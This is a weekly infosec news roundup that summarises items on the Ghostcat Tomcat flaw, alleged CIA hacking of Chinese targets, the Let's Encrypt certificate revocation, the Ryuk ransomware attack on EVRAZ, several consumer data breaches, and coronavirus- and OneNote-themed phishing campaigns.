Secjuice Squeeze Volume 16

Welcome to the 16th edition of the Secjuice Squeeze, a curated selection of interesting security articles and infosec news that you may have missed, lovingly prepared for you every week. This week's volume compiled by Secjuice writers Bhumish Gajjar and Mike Peterson.

Active-scans for GhostCat vulnerability on the Rise, Patch Now!

Ghostcat is a critical vulnerability found in Apache's Tomcat server with a CVSS score of 9.8. It is present in the Apache JServ Protocol (AJP) and found in Tomcat versions 6.x to 9.x. Apache has already released patched versions to tackle this vulnerability.

By exploiting this vulnerability, an attacker can read the contents of configuration files and source code of all the Tomcat web apps – in addition to that, if file upload is allowed – it can result in remote code execution. Tenable says that many PoC exploits are already available on GitHub. Bad Packets says that "mass scanning activity targeting this vulnerability has already begun. PATCH NOW!"

Source: bleepingcomputer.com
Curator: Bhumish Gajjar

CIA accused of hacking Chinese targets for 11 years

Qihoo 360, the largest cybersecurity vendor in China has accused the CIA of hacking Chinese companies for more than 11 years. They have published a report claiming that the CIA hacked targets in China's aviation industry, scientific research institutions, petroleum industry, Internet companies, and government agencies.

Qihoo has found malware samples that show that they were created while working in the U.S. East Coast time-zone. These malware samples were compared against a trove of CIA's digital spy tools released by WikiLeaks in 2017. This is very similar to the report published by Qi-Anxin last September, which said that the CIA had allegedly targeted the Chinese aviation sector.

Source: zdnet.com
Curator: Bhumish Gajjar

Let's Encrypt to revoke 3 Million TLS certificates

The most popular free certificate authority – Let's Encrypt said that they will be revoking 3 million Transport Layer Certificates on Wednesday, March 4. They have made this move due to a Certificate Authority Authorization (CAA) bug. This CAA bug impacts how their software checks domain ownership before issuing certificates.

This bug was found in Boulder software in July – which was detected last Sunday and patched on the same day. It affects 3 million, i.e., 2.6 percent of their active certificates. Users say that they were notified of the revocation on Tuesday and given 24 hours to resolve the issue.

Source: threatpost.com
Curator: Bhumish Gajjar

Report: most cyberattacks in 2019 were malware-free

It appears that the use of malware in coordinated cyberattacks is slowing down. Instead, attackers are using sophisticated techniques spearheaded by human adversaries. That could include "old school" command line attacks, the use of legitimate tools and stolen credentials, and of course, social engineering.

This, of course, spells trouble for cybersecurity professionals and other defenders, as these types of attacks can be hard to detect by humans – not to mention that they can bypass automated software with ease. The main question among CrowdStrike researchers is whether the trend will continue.

Source: darkreading.com
Curator: Mike Peterson

North American steel manufacturer temporarily shutdown due to Ransomware

One of the world's largest steel manufacturers and mining operators, EVRAZ, has been hit by ransomware. It has hit and brought down the company's North American branches across Canada and the U.S. The infection has been identified as Ryuk ransomware strain.

Temporary layoffs are being issued, and they are hitting employees' wallets. The company's I.T. team has been said trying to contain the infection of ransomware. EVRAZ did not officially accept their systems being infected, but the employees are venting this out to media.

Source: zdnet.com
Curator: Bhumish Gajjar

Trio of data breaches hit U.S. and global consumers

Data breaches are on the rise, and this week is just the latest evidence of that. According to reports, three separate enterprise data breaches have hit clothing firm J.Crew, U.S. carrier T-Mobile, and two subsidiaries of cruise ship company Carnival.

There are a lot of unknowns, including the number of impacted customers at J.Crew and T-Mobile. But some of the data leaked is highly concerned. While Carnival's breach involved the fewest number of compromised customers, the leaked data included Social Security numbers and credit card information. You may not be able to prevent enterprise breaches as a consumer. Still, these examples should bring up hard questions about who you trust your data with.

Source: darkreading.com
Curator: Mike Peterson

Scammers continue to leverage coronavirus in cyberattacks

Malicious actors and continuing to use current events and tragedies to target vulnerable victims. Case in point: security researchers spotted two separate malware campaigns taking advantage of the coronavirus to spread malicious software.

One of those campaigns is a phishing email with a PDF ostensibly containing COVID-19 safety measures. As you might expect, the PDF actually contains a Remcos RAT dropper and a VBS file. Another file, this one a Microsoft Word document, contains malicious macros aimed at dropping a backdoor on impacted systems. The moral of the story: tell everyone you know to be careful what they click on

Source: threatpost.com
Curator: Mike Peterson

Phishers used Microsoft OneNote to evade detection

Phishing campaigns are a dime a dozen, but occasionally one will surface that uses unique methods and techniques. Researchers at Cofense have discovered one particular phishing campaign that used Microsoft OneNote, a digital notebook that automatically saves and syncs notes, to evade antivirus and other detection tools.

More specifically, the attacker used OneNote to experiment with various phishing lures that loaded the Agent Tesla key logger onto a user's device or linked to a phishing page. Sometimes, the attacker did both. To further mask the attack, the threat actor sent a OneNote link disguised as an order invoice. They then swapped out that OneNote page with different layouts, malware samples, and phishing links for several weeks.

Source: threatpost.com
Curator: Mike Peterson